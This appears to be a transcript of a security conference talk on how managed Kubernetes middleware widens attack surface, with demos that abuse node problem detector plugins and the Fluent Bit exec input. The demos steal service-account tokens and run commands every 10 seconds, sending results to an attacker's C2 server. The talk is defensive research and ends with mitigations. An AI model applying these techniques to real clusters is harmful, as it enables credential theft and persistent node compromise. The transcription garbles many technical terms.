 This research has been done in collaboration with Parak, however, he couldn't be here today. So you'll have to bear with me. OK, who am I? I'm a part of also with the threat research group. Before that, I published some works in runtime verification of all things before I moved to security. So you might know me from UBC's Container Scan and Falco Bypasses, various blocks on Kubernetes security, et cetera. I'm also using X and Eurosis Artifact Evaluation Committee member. That's because I'm a firm believer in bridging the gaps between academic research and industry, and I think we're not doing this enough. All right, what's the talkies about? The premise. The core Kubernetes cluster components are a necessity. Well, clearly, otherwise, how would you run the cluster without the API server? That's nonsense. Users were closed, of course, also a necessity because otherwise, why would you stage a cluster? However, what about everything else? And by everything else, I mean stuff that comes free in the cluster, in the managed cluster, particularly, right? Like everything around the logs, exporters, CSI drivers, metrics, et cetera, et cetera. Something that is not necessary for the existence of the cluster, however, something that's very critical to operate the production level cluster, otherwise, it's going to be really tricky. So the examples are, for example, container watcher on GKE, OSM controller on EKS, AWS node on EKS, but not Kube Proxy. You could Kube Proxy for where I stand, this is integral part of the Kubernetes control plane, right? And Corgenus, for example, also. This is like, we must have it. OK, and there are various lists of those add-ons slash middleware slash plugins, so that's, there are multiple names for that. However, there's no centralized source for those components. So we'll start, we'll try to make some other numbers. In numbers, in terms of numbers, if you stage GKE or EKS cluster V1.25, you'll get by default 25 demon sets, replica sets or staple sets in the, mostly of them, most of them in the Kube system namespace, of course. And I'm only considering negative Kubernetes components because there are more host-level components as well. And in addition, yeah, so basically, we get a batch of those. OK, so now as we're clear on the definition, let's go with the premise. We have, of course, this is a cloud security talk, so as every cloud security talk, we must start with the shared responsibility model. However, let's take this model from the cloud, from the wider cloud to the Kubernetes space. OK, and we can see that there's a horizontal separation between master nodes and worker nodes, but there's also vertical separation, right? We have control plane, mark the blue, we have green customer workloads, and everything in between, right? So virtual machine hardware, this is clear. OK, this is CSP responsibility, we're good. But what about that middleware? The stuff that's in the middle. And the problem here is that we see that middleware is running as part of the master nodes and worker nodes. So this separation where we think about, as customers, as we are responsible for worker nodes and CSP responsible for master nodes, this separation is not clear, OK? And the boundaries are blurred here. And the most obvious problem is upgrade, right? Because cluster users focus on workload security, not control plane and not the middleware. However, the vulnerability passion process isn't clear. And if we talk about the previous research from about cluster graze zone in the cloud, right? In the context of the cloud where our vulnerability research group found some vulnerability in my agent in Azure, however, it wasn't clear who is supposed to fix that. Whether it's a customer's responsibility or CSP. And similar problems we have in our managed clusters. Two scenarios. First, CSP wants to upgrade, but requires user action. Of course, if you're running a production cluster, you know that upgrade of the worker nodes is not a trivial action. Second scenario, user wants to upgrade. But the component is controlled by CSP. So they cancel. We're in the problem here. OK, before we go further, let's adjust our expectations. Now we're going to talk the serious business. This is not a scopeable little bit of research. This is not the security audit of Kubernetes components. And this talk is not about the threat model. But it is a bit of everything above. And more importantly, this is a risk assessment of previously unnoticed surface. And initial attempt to draw conclusions, call to arms. You name it. OK, now let's start with the hypothesis. First, middleware increases attack surface. Good enough? Well, not good enough, because really, every software increases attack surface, right? So this is kind of triviality. Let's try this one. Middleware increases attack surface significantly. But then you might ask, what is significantly? What does this mean? How about this one? Middleware increases risk in a non-trivial way. And I think this is a good one, because ultimately, we as a cluster operators, we're interested to know what's the risk in the cluster, right? And non-trivial way, I know it's a bit fluffy, but at least it has the leeway for interpretation. So let's run with this. What do we need to do to confirm or just prove the hypothesis? Well, we need a method and perform. So what we did, we performed analysis. We did RBAC and permissions analysis, image analysis, security posture, config, behavioral runtime, and logs, et cetera, et cetera. Out of it, we're a safe security risk assessment. Great, so let's go into details. First of all, basic security question. Out of those 25 deployments, about a third of them actually run shared Linux namespaces. It's not ideal, right? Because this is, you know, the shared Linux namespaces. That means that there's more attack surface and more connection points between the container and the kernel. It's not ideal, but hey, sometimes we need to do this. Third of those have privileged containers or containers with added capabilities beyond the default Kubernetes set. Okay, so that could be Netbind, Ptrace, you name it. And an additional third of them have mounted sensitive host volumes. So what does this mean? It's not just slash var log, whatever, something not interesting. It's either host or slash ptc or slash c, something juicy like that. So we can see that the footprint is pretty serious. Like in terms of privileges, these workloads, the middle-war workloads, they require quite serious privileges here. Intuitively, it's kinda okay because they probably need this to do, but it gives a sense of uneasiness, right? About the impact, right? Because after all, the risk is probability times impact. So this is image analytics. Okay. Middle-war images have lots of vulnerabilities, well, what else is new, right? Yeah, it's a couple examples here. Here we see like 182 vulnerabilities, okay, right? However, so do the core images and control plane. And in addition, in general, number of vulnerabilities is proportional to number of packages. And so really we cannot state that middle-war images are worse off than core components. Not for the good reason, just because core components also suck, but hey, like we didn't want to go into the statistical analysis to claim that they have more vulnerabilities. So we left it at that, but instead we went into the behavioral analysis. So there's a runtime stuff, right? Like looking at P trace, what are they actually doing? And logs. And logs are a very interesting source because it can show stuff like unexpected principles acting, unexpected permissions, or discrepancies between the CSPs. If you think about it, even the same component, acting different in between the CSPs, that evidence of something either, I don't know, either differences in the behavior or in the source code or something interesting, basically. So I hope you can see this. This is an example of AKS. I think it's Log Explorer. This is an event, execution into the pod, by AKS, problem detector. So here's the username. And what it does, it execs into the connectivity agent on AKS. And this was the clue that we have apparently in AKS, node problem detector. Before that, I didn't know what's this. So if you, let's say you run in AKS and AKE, you might have not known this, but you also run node problem detector. And that's gonna be the star of our use case one. So in short, node problem detector is like health checker on steroids. It basically runs a bunch of checks on the node and tells us if everything's good or bad, while not asked to the API server. And there's a parent repo, but AKS and GKE they run their own stuff. Okay, like they modify the upstream repo and we don't have access to that source. The interesting part is that starting at some version, NPD node problem detector runs as a host service, not as a demo set. In AKS, according to best practices guide, they still recommend to install the demo set deployment. But on AKS GKE, it runs as a host service. So I'll let it sync. There's a component in your AKS GKE cluster that acts on the Kubernetes level. It executes into pods. And at the same time, it runs as a host service, as a process, root process and it runs periodically. So this is how it looks on the node. This is GKE, I think this is AKS. You can see that there's not one detector process and it's picking a bunch of configs. And in terms of version, and the latest version is V1 point, sorry, 8.12 I think or 8.13. And you can see that AKS and GKE V1 point 25, they're running 0.0810, which is a bit old, kind of old like one and a half year. So not ideal, but hey. All right, so feature on the scope, how can we exploit this component, right? That's the point of this presentation. Feature on the scope, drum roll, custom plugin monitor. That's a feature that extends the core functionality on the NPD and basically lets us to define new health checks. And this is the chain of attack that we will perform in the next slide. So we'll see the demo and then I'll stop and analyze the attack, right? We're going through from the ability to write the script into the certain folder, node roman detector picks it up and then we're getting all kinds of bounties in terms in the form of persistency and periodic execution. All right, so demo number one. You might recognize the guestbook app, PHP app from GKE tutorials. So I modified it a bit. We can see the front end read his follower. So very realistic, I hope. And the problem with the front end, well, I guess it's a minor problem because it just, it maps slash it's in. Like it's okay, right? Because slash it's is like it keeps configuration on the host so I guess it needed the configuration. So it mapped the slash it's on the host and that's what we're going to explore. So we have to load balancer feeding the IP outside and this is how we can access that application. So just regular messaging service, I guess. But the thing is that there's a guestbook PHP file as well there. And there's like unsanitized parameter there called store that actually allows us to perform the RC. There we go. So we can run ls slash and attacker sees this one. So I didn't do nf and stuff, but the attacker can easily understand that this is a pod and this is trying AKS. So this looks interesting. It's a host config. That's the name of the slash it's the actual host config and the attacker just goes into the place where NPD expects to see plugins, list the plugins and see, oh, this is really AKS worker nodes. So we can, let's see what we can do with that. And they can even dump this, the plugin. This is how plugins the actual works. This is just the bar script. Now the problem because the container runs is root. So of course they can update these batch streets and that's what we're gonna do. So I saved you the pain of watching me updating this file through the URL line, but this is the final result. You can see that we are doing the, we're cutting the token and namespeed certain token from varlib.cubelet and sending it to the C2 server. Okay, that's the point here. And on this screen, I'm staging my C2 server. So once I update that specific check terminate.sh script, that runs every minute. So there are, there's additional folder of plugins.json that define how those scripts run and they run periodically with certain periodicity. And there we go. This is C2 and we're getting the token and the cube system. And this one I think actually OSM controller token that reaches pretty powerful. So from this point in on, we can, from outside we can go to the API server and use this token and just on the, on the pod. So this part, this varlib.cubelet, remember that this stuff executed by the node problem detector, not by the pod. It wasn't executed from the pod. It was executed from the node by node problem detector. That's how it got the access to the varlib.cubelet because the pod itself didn't have that. All right. So let's, let's see what we had here. We, we started with, we could start with the escape, right? We can start with the container escape, but we don't need to, we don't even need compromise manage because we can, we can exploit some kind of misconfiguration and file writing ability of the pod. Okay. And this can happen in any pod in the cluster. Why? Because node problem detector is sort of like a demon set. It runs on every working node. So one mistake in one of the working nodes is enough. Okay. And then we're right in the script. We, node problem detector immediately, pretty much immediately picks up a plugin and then we have the periodic execution as a root to do nasty stuff. Like dot SSH basically established persistence and eventually spread to other nodes and through usage of the tokens, right? Now the interesting part here is that first, this all happens under the radar of API server. So what's the consequences? There is no audit trace and admission controller is blind to this attack because it happens underneath the radar of API server. And probably we will bypass the EDR because node problem detector is known to all the EDR solution. Otherwise it would generate a bunch of false positives. So if you ask me, this is pretty cool. This is kind of, I guess it can be described as a Kubernetes privilege escalation from writing into certain folder in the pod context to owning all the nodes. Okay. Let's hold on. Use case two, fluent bit. Okay, fluent bit. I bet everybody knows this. A very popular log management platform and it's installed on every GKE cluster and you can install it according to EKS best practices. You install it from upstream. Latest versions is 1.812. Okay, this is not very interesting but what's interesting is the feature that we're going to exploit the exact input plugin. With such a juicy name, of course we couldn't let it stay. And so we're going to use this construct. So for those of you who never use fluent bit, it basically, the config consists of a bunch of sections, input sections, that define the source of the logs, then parser and filter sections that define the actions with the logs and then the output sections that actually say where to send the logs. And this nasty plugin input, basically instead of defining the source of the logs, you can just perform command. In this case, ls-warsflow. But of course, we're not interested in the logs, we're interested in something more serious. And that's the attack flow. We will update the config map that used by fluent bit. Fluent bit will pick up this malicious config and because the cluster will shrink and expand, eventually the config map, the malicious config map will get picked up by all the new fluent bit points. Okay, so let's see this in action. All right, so we find ourselves in EKS cluster, we see that we have only one node for now, just easy edit way. And in the plots, we can see that we have the fluent bit. There is that it is. Now we are dumping the CMs. This is the fluent bit config. This is the CM that we're going to use and Amazon Cloud Watch is the default namespace that I just followed the best EKS best practices guide to install this given set. Now, if we're taking the CM and dumping it, the pretty print doesn't know how to deal with that. It's a no problem, it hasn't been solved. However, when you added the CM, it's actually printed pretty. So what we're doing here, we're adding it and adding that construct input and output and all. For the sake of time, I'll move up a bit. And explain what happens here. So as an input, we define two commands, hostname and ID. And we can change as many commands as we want. And this, they will get executed by the fluent bit every 10 seconds. So you might not see this, but this is 10. You give interval, and then you give output. What to do with this input? So in this case, the output of these commands will get sent to our C2 server, of course, to port 4444, and that's good enough for us. Okay, so we were able to update the config map. And now we're just waiting. What are we waiting for? The config map is not real time, right? The update doesn't work in real time. So we're waiting for a new node to get created and to pick it up. So behind the scenes, to make it faster, I'm just increasing the number of nodes to two. And now I'm waiting for another node to appear. And then hopefully the next fluent bit pod, because it's a demon set, right? It will pick up the new config and it will execute whatever we ask for me. Okay, so there we go. We found the pod and then we see the additional container created pod, this new fluent bit pod, great. And because we define it every 10 seconds, so this, the commands should execute every 10 seconds. So in parallel, we are starting our C2 Python server and there we go, there we get in the commands. And you see that fluent bit packs it really nicely. It just runs hostname, then runs ID, packs them as adjacent. We just can, we can use the fluent bit functionality to retrieve, to exfiltrate whatever data we want. All right, so this was the second use case. What happened here, right? So our assumption, and I want to be very clear about our assumption. Our assumption was that we had mis-configuration, some kind of config map update, right? It happens, we like, in this case, we were able to update the config map that fluent bit is using and eventually all new nodes because the production cluster grows and shrinks, right? It's very dynamic. So eventually, if you think about it, all the new nodes will have this turnover and they will pick up the new config map. And we will achieve the all node persistent execution. So this is cool stuff because it's resistant to restart because config map is saved in its CD, right? So even if the nodes will get restarted or created new one, they will pick that malicious config map. And again, we are running underneath the API server. Admission controller is blind. There's no audit trace and we probably bypass CDR because it all happens as a fluent bit. Now the impact is limited by what fluent bit can do, but typically fluent bit can assemble, collect tons of information because it's a log management platform. So there are tons of host paths mapped into the fluent bit. So attacker can use that. All right, what can we do to reduce the risk? One, the first thing of course, like I don't know, use the security vendors. However, what's the problem with security vendors and control plane and middleware? They typically accept control plane and middleware components, right? Either by the cube system or through the Kubernetes users or container image names. Some examples, gatekeeper flow that accept the cube system. This is, I think, tracer rule, right? That accepts flannel, DE, cube proxy, et cetera, et cetera, based on the process name. And this is a Falker rule that accepts based on the Kubernetes containers that are, this is a macro that defined elsewhere before in the file. It just has a list of white listed containers. So that's a problem. Okay, what else can we use? Well, let's use defense PSS, right? That's the PSP V2. Well, not so fast because you can't apply PSS on the cube system namespace. And not just cube system namespace, but a couple more namespaces, like cube list public or something like this. So this is a problem. This is a problem because we know that many, many middleware components are being dumped automatically into the cube system namespace. On the other hand, we can't use our typical security controls, Kubernetes security controls. Okay, what else can we use? Well, let's try the user NS. This is also a new shiny feature. In V1.25, it became alpha. So it basically limits the impact of the container escape so that now container root is not host root. So this is pretty cool. However, you can't use user namespaces on more than half of those components from the end of our member. On 13th out of 25, you can't use it. Why? Because there are certain conditions. There's like, we sketch this in our blog. There's certain conditions where you just can't use user names. And that's if you need, for example, access to resources that managed by one of the initial namespaces. Because the thing with the user namespace is that it's very rigid and inflexible. So it's everything or nothing. So unfortunately, we probably won't be able to use it on the middleware. What else? How about we just remove all the middleware on the host level? Well, but then you can't apply Kubernetes level security controls, right? And then they will probably get excluded from the EDRs as well. So this is also not a great solution. What is a good solution? Well, it's not here, but first of all, don't try to contain as root, right? We keep in this mantra like multiple years, but still most of the containers are running as root because it's handy. But that would probably stop the first attack, right? The user won't be able, the attacker won't be able to write into the slash. It's if not true, right? In this case, this is a bit different what I wanted to show you with the CoreDNS. CoreDNS has the same problem as FluneIt. It takes the config map in the config map in the CoreDNS config map. By the way, it's installed on all ETS and ETS clusters by default. There's a plugin called on. Does anybody know about this? I didn't know. So you can write something. If you can update the config map, you can do something like this. One startup and then comment execution. So that's a problem. However, it's not use case number three. Why? Because this doesn't work. Why doesn't it work? Because touch executable file not found. Who knows what's this? This means that CoreDNS doesn't have batch execution context because it's a slim container, makes slim images. It doesn't have the package manager as well. So this works. Okay, two conclusions. Inclusive controls, right? We saw that our security controls don't take into account cube system and middleware, unfortunately. Threat models, a word about threat models. If you remember CNCF financial group created the trust boundaries, right? And the attack trees for establishing persistence, you won't find middleware on those diagrams. It's all about proper control playing. Another prominent example is the trail of bid security audit, right? That's the components that they took a look. Do you see any middleware component? I don't see FluentV here. I don't see no problem detector. But it's still running on every AKS and GKE node. So I'm rethinking to do, perhaps we need to rethink our permission. So in my book, config maps update, it's very powerful. It's admin, boom. Namespace update patch power user because then with just namespace, removing annotation on namespace and labels, you can remove the security control on any namespace. Perhaps we need to think about CSP based mapping. Rethinking Kubernetes detection. We need a multilevel approach. We saw that it's not just, it's misconfiguration. Then you need to understand the RBIC impact. And then you probably need log based detection as well. And on top of that, you probably need agent based detection as well. Some kind of sensor to detect the node from the vector somehow, right? So you need this multilevel approach to the cluster. It's not just log, it's just one thing just won't work with this complex attacks. And eventually Rethinking CSP visibility. The ultimate question, what do we really have in our working nodes? And I hope that this talk was the first step towards answering this question. So that's all I had for today. Thank you so much for coming. I'll be happy to take questions if we have. If not, I'll just hang around here and I will be on snack. Thank you.